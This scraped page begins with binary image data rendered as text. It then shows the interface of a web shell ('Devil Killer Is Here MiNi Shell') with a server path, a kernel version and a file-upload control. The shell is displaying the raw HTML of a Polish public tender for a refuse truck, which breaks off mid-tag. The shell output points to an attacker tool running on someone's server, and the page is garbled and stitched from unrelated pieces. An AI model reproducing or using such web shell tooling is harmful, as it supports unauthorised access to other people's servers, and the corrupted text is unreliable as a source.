JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250410/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250410/0018600401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa nowego pojazdu specjalistycznego typu śmieciarka o DMC do 13 ton” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAKŁAD USŁUG KOMUNALNYCH SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">ZUK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 072112533</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. gen. Józefa Bema 12A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Oświęcim</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-602</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL21A - Oświęcimski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zuk.oswiecim.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zuk.oswiecim.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa nowego pojazdu specjalistycznego typu śmieciarka o DMC do 13 ton” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a9af8842-1a8f-47b4-8bc2-a68c0ae6e65e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00186004</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-a9af8842-1a8f-47b4-8bc2-a68c0ae6e65e <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywać będzie się przy użyciu:<br/>1) Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl ,<br/>2) ePUAP https://epuap.gov.pl/wps/portal (nie dotyczy składania ofert);<br/>nazwa Zamawiającego w systemie ePUAP: Zakład Usług Komunalnych Spółka z o.o.<br/>adres Zamawiającego: 32-600 Oświęcim, ul. Bema 12A<br/>adres skrzynki ePUAP: /ZUKOSWIECIM/SkrytkaESP<br/>3) poczty elektronicznej (nie dotyczy składania ofert)<br/>adres e-mail: sekretariat@zuk.oswiecim.pl<br/>Złożenie oferty następuje wyłącznie za pośrednictwem platformy e-Zamówienia: https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-a9af8842-1a8f-47b4-8bc2-a68c0ae6e65e</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>2. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>3. Sposób komunikowania się Zamawiającego z Wykonawcami:<br/>a) Komunikacja w postępowaniu, z wyłączeniem składania ofert/ odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów<br/>elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym , mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem typu zewnętrznego lub wewnętrznego. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub<br/>dokument z wszytym podpisem (typ wewnętrzny).<br/>b) Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów (Dz. U. poz. 2452), przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>- w formatach danych określonych w przepisach rozporządzenia Rady Ministrów (Dz. U. z 2017 r. poz. 2247) i przekazuje się jako załącznik, lub<br/>- jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej np. w treści<br/>wiadomości e-mail lub w treści „Formularza do komunikacji”.<br/>c) W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>sekretariat@zuk.oswiecim.pl (nie dotyczy składania ofert).<br/>d) Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>e) Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>4. Jeżeli wraz z ofertą składane są dokumenty zawierające tajemnicę przedsiębiorstwa wykonawca, w celu utrzymania w poufności<br/>tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku<br/>„Dokument stanowiący tajemnicę przedsiębiorstwa”. Zarówno załącznik stanowiący tajemnicę przedsiębiorstwa jak i uzasadnienie zastrzeżenia tajemnicy przedsiębiorstwa należy dodać w polu „Załączniki i inne dokumenty przedstawione w ofercie przez Wykonawcę”.<br/>5. Formularz ofertowy podpisuje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym typ<br/>wewnętrzny.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1; dalej „RODO”), informuję, że: <br/>1) Administratorem Pana/i danych osobowych jest Zakład Usług Komunalnych Sp. z o.o., ul. Bema 12A, 32 -600 Oświęcim;<br/>2) Administrator wyznaczył inspektora ochrony danych, można się z nim kontaktować po-przez e-mail: sekretariat@zuk.oswiecim.pl;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem prowadzonym w trybie przetargu nieograniczonego o udzielenie niniejszego zamówienia publicznego;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74, art. 269 ustawy Pzp;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>7) w oparciu o Pani/Pana dane Administrator danych osobowych nie będzie podejmował wobec Pani/Pana zautomatyzowanych<br/>decyzji, w tym decyzji będących wynikiem profilowania,<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (wy-jaśnienie: skorzystanie z prawa do<br/>sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień<br/>umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO (wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych adres: ul. Stawki 2, 00-193 Warszawa, gdy uzna<br/>Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>Pozostałe informacje w rozdz. 1.4 swz</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">03/PZ/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> I.Wymagania dla pojazdu:<br/>1)	Samochód o DMC do 13 000 kg<br/>2)	Typ podwozia: dwuosiowy,<br/>3)	Rozstaw osi: max 3300 mm,<br/>4)	Max dł. samochodu 7300 mm,<br/>5)	Zawieszenie przednie – resory paraboliczne, tylne – pneumatyczne,<br/>6)	Sterowanie zawieszeniem pneumatycznym z pilota,<br/>7)	Silnik o mocy min. 240 KM, maksymalny moment obrotowy min 1000 Nm<br/>8)	Norma emisji spalin Euro 6,<br/>12)	Pojemność silnika od 6000 cm3 do 7000 cm3,<br/>13)	Skrzynia biegów automatyczna ze sprzęgłem hydrokinetycznym<br/> 14) Liczba przełożenia skrzyni biegów do przodu min 8<br/>15) Przystawka odbioru mocy niezależna od sprzęgła – moment obrotowy dostępny w czasie jazdy i postoju,<br/>16) Kolor kabiny biały,<br/>17) Belka dachowa z lampami ostrzegawczymi LED z napisem ZUK,<br/>18) Światła do jazdy dziennej LED,<br/>19) Kabina trzy miejscowa (dzienna),<br/>20) Zawieszenie kabiny mechaniczne,<br/>21) Fotel kierowcy regulowany, amortyzowany z pasem bezpieczeństwa,<br/>22) Pojedyncze siedzenia dla 2 pasażerów wyposażone w pasy bezpieczeństwa,<br/>23) Gumowe dywaniki podłogowe,<br/>24) Koło kierownicy po lewej stronie z możliwością regulacji położenia,<br/>25) Podgrzewane i elektrycznie regulowane lusterka zewnętrzne prawe i lewe,<br/>26) Elektrycznie sterowane podnośniki szyb drzwi kierowcy i pasażera,<br/>27) Szyby atermiczne, przednia i boczne,<br/>28) Zewnętrzna osłona przeciwsłoneczna,<br/>29) Wejście do kabiny z wyłącznie jednym stopniem wejściowym, <br/>30) Systemy ABS, EBS, ESP,<br/>31) System ostrzegania przed kolizją z przodu z hamowaniem awaryjnym,<br/>32) Immobilizer,<br/>33) Klimatyzacja manualna,<br/>34) Podgrzewany filtr paliwa,<br/>35) Wlot powietrza w górnej części kabiny,<br/>36) 2 akumulatory min. 180 Ah,<br/>37) Tachograf cyfrowy zalegalizowany (instrukcja w języku polskim),<br/>38) Układ wydechowy spalin skierowany do dołu pod podwozie<br/>39) Hamulce tarczowe osi przedniej i tylnej,<br/>40) Obręcze stalowe kół z oponami o średnicy R17,5,<br/>41) Na osi napędowej koła z oponami z bieżnikiem regionalnym,<br/>42) Koło zapasowe oś przednia (dołączone luzem),<br/>43) Przewód do pompowania kół,<br/>44) Zbiornik paliwa min 150 litrów zamontowany po prawej stronie,<br/>45) Zbiornik AdBlue min 35 l zamontowany po prawej stronie,<br/>46) Blokada mechanizmu różnicowego tylnego mostu,<br/>47) Zewnętrzny mechaniczny wyłącznik główny prądu,<br/>48) Trójkąt ostrzegawczy, gaśnica, kpl. kluczy z podnośnikiem min 10 ton,<br/>49) Lampy w drzwiach oświetlające stopnie wejściowe,<br/>50) Wskaźnik grubości okładzin hamulcowych z ostrzeżeniem o zużyciu<br/>51) Hamulec przystankowy zgodny z normą DIN EN-PN 1501-01 <br/>52) Min 2szt. klinów zabezpieczających pojazd przed przemieszczaniem na terenie pochyłym,<br/>53) Przedni zaczep holowniczy,<br/>54) Zabudowa o przekroju prostokątnym, ożebrowana, wykonana ze stali o podwyższonej odporności na ścieranie i korozję, całkowicie spawana, kilkakrotnie gruntowana i lakierowana na kolor biały spójny z kolorem kabiny podwozia<br/>55) Podłoga skrzyni ładunkowej wykonana z blachy o podwyższonej wytrzymałości na ścieralność o grubości min. 4 mm,<br/>56) Zabudowa z urządzeniem zasypowym tylnym do współpracy z pojemnikami od 120 do 1100 litrów,<br/>57) Pojemność skrzyni ładunkowej na odpady min. 7,5 m3,<br/>58) Objętość kosza zasypowego min. 1,8 m3,<br/>59) Wanna odwłoka wykonana z blachy trudnościeralnej Hardox 450 lub równoważnej o grubości min. 8 mm,<br/>60) Automatyczne ryglowanie odwłoka,<br/>61) Uszczelnienie pomiędzy odwłokiem a skrzynią poprzez zamontowanie wymiennej uszczelki,<br/>62) Mechanizm zgniatania liniowo-płytowy,<br/>63) Siłowniki prasy zgniatającej umieszczone na zewnątrz odwłoka, osłonięte przed uszkodzeniem mechanicznym,<br/>64) Stopień zagęszczenia odpadów min. 1:5,<br/>65) Możliwość zmiany ciśnienia (stopnia zagęszczenia) w układzie hydraulicznym poprzez<br/>przełączenie w pulpicie w kabinie kierowcy,<br/>66) Krawędź zasypu położona max 1300 mm od podłoża,<br/>67) Skrzynia ładunkowa posiadająca właz rewizyjny po prawej ścianie umożliwiającej dostęp do<br/>siłownika płyty wypychającej z zabezpieczeniem zgodnym z EN1501-1,<br/>68) Układ uwalniania zakleszczonych przedmiotów,<br/>69) Króciec odpływowy w wannie załadowczej z kurkiem spustowym,<br/>70) Odległość tylnego zwisu pojazdu skompletowanego nie dłuższa niż 2550 mm,<br/>71) Sterowanie urządzeniem zasypowym umieszczone po obu stronach odwłoka za pomocą dźwigni,<br/>72) Urządzenie zasypowe w konstrukcji stalowej ocynkowane, <br/>73) Uchylna burta stalowa ocynkowana<br/>74) Mechaniczne ryglowanie listwy dociskowej dla grzebienia urządzenia zasypowego<br/>75) Kamera umieszczona z tyłu zabudowy, monitor zainstalowany w kabinie kierowcy,<br/>76) Sterowanie dla automatycznego cyklu załadunku oraz cyklu pojedynczego,<br/>77) Sterowanie płytą wypychającą ,,wysuwanie i wsuwanie” odbywać się powinno z pulpitu<br/>sterowniczego znajdującego się w kabinie w zasięgu ręki kierowcy jak i na zewnątrz pojazdu,<br/>78) Stopnie dla obsługi z detekcją obciążania i rozłożenia zgodne z normą EN-PN 1501,<br/>79) Minimum dwa wyłączniki bezpieczeństwa,<br/>80) Urządzenia zabudowy wyposażone system centralnego smarowania min 26 pkt smarnych <br/>81) Oświetlenie wg obowiązujących obecnie przepisów, Min. 2 lampy robocze na górze odwłoka skierowane do tyłu, oraz po min 2 na bokach skrzyni ładunkowej <br/>82) Pasy odblaskowe (ostrzegawcze) na kabinie i odwłoku,<br/>83) Błotniki kół tylnych z chlapaczami,<br/>84) Sygnał dźwiękowy przy cofaniu pojazdu,<br/>85) Pojemnik z wodą do mycia rąk,<br/>86) Zabudowa wykonana zgodnie z normą PN-EN 1501-1 oraz posiadać znak CE,<br/>87) CB Radio,<br/>88) Gwarancja min 24 miesiące obejmująca całość podwozia wraz z zamontowanym wyposażeniem dodatkowym i osprzętem, obsługa serwisowa w okresie gwarancji wliczona w cenę pojazdu - dotyczy pełnego zakresu obsługi i napraw wraz z materiałami eksploatacyjnymi (za wyj. szyb, opon i akumulatorów). Warunki gwarancji:<br/>a)	reakcja serwisu w ciągu 24 godzin roboczych od momentu zgłoszenia awarii – odpowiedź na zgłoszenie, ustalenie trybu i terminu działań serwisu; <br/>b)	podjęcie naprawy/przystąpienie do czynności serwisowych w ciągu 48 godzin roboczych od momentu zgłoszenia awarii; <br/>c)	na wniosek Zamawiającego nieodpłatny dojazd serwisu do siedziby Zamawiającego w celu wykonania przeglądu lub naprawy awaryjnej; <br/>d)	W przypadku konieczności przeprowadzenia naprawy lub przeglądu poza siedzibą Zamawiającego, Zamawiający zobowiązuje się dostarczyć pojazd do wskazanego serwisanta, jeżeli jego siedziba znajdować się będzie w odległości nie większej niż 100 km od siedziby Zamawiającego. W przypadku, w którym siedziba serwisanta znajdować się będzie w odległości większej niż 100 km od siedziby Zamawiającego Wykonawca zobowiązuje się dostarczyć pojazd do siedziby serwisanta oraz przekazać go Zamawiającemu po naprawie na własny koszt i ryzyko. <br/>89)	Pojazd winien spełniać techniczne wymagania homologacyjne oraz bezpieczeństwa zgodnie z warunkami rozporządzenia w sprawie bezpieczeństwa ogólnego pojazdów (General Safety Regulation – GSR) określającymi systemy bezpieczeństwa, w które powinny zostać wyposażone nowe typy samochodów ciężarowych, według przepisów Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2019/2144 z dnia 27 listopada 2019 r. w sprawie wymogów dotyczących homologacji typu pojazdów silnikowych i ich przyczep oraz układów, komponentów i oddzielnych zespołów technicznych przeznaczonych do tych pojazdów, w odniesieniu do ich ogólnego bezpieczeństwa oraz ochrony osób znajdujących się w pojeździe i niechronionych uczestników ruchu drogowego (…)”,<br/>II Wymagane dokumenty jakie będzie zobowiązany dostarczyć Wykonawca wraz z przedmiotem zamówienia:<br/>1) Faktura sprzedaży kompletnego pojazdu<br/>2) Instrukcja obsługi podwozia (w języku polskim).<br/>3) Instrukcja obsługi, eksploatacji i konserwacji zabudowy (w języku polskim).<br/>4) Katalog części zamiennych dla podwozia i zabudowy (w języku polskim).<br/>5) Książka gwarancyjna podwozia.<br/>6) Książka gwarancyjna zabudowy<br/>III Wymagania w zakresie dodatkowego wyposażenia:<br/>1)	Koło zapasowe oś przednia (dołączone luzem),<br/>2)	Pojemnik z wodą do mycia rąk,<br/>3)	Komplet kluczy z podnośnikiem samochodowym min. 10ton,<br/>4)	Skrzynka narzędziowa,<br/>5)	Trójkąt ostrzegawczy,<br/>6)	Apteczka,<br/>7)	Gaśnica,<br/>8)	Kliny zabezpieczające pod koła (min 2 szt.),<br/>9)	Sterowanie zawieszeniem pneumatycznym z pilota,<br/>10)	Dynamiczna waga samochodowa kompatybilna z systemem Globtrak<br/>c.d. w pkt. pozostałe informacje </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34144510-6 - Pojazdy do transportu odpadów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80511000-9 - Usługi szkolenia personelu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span 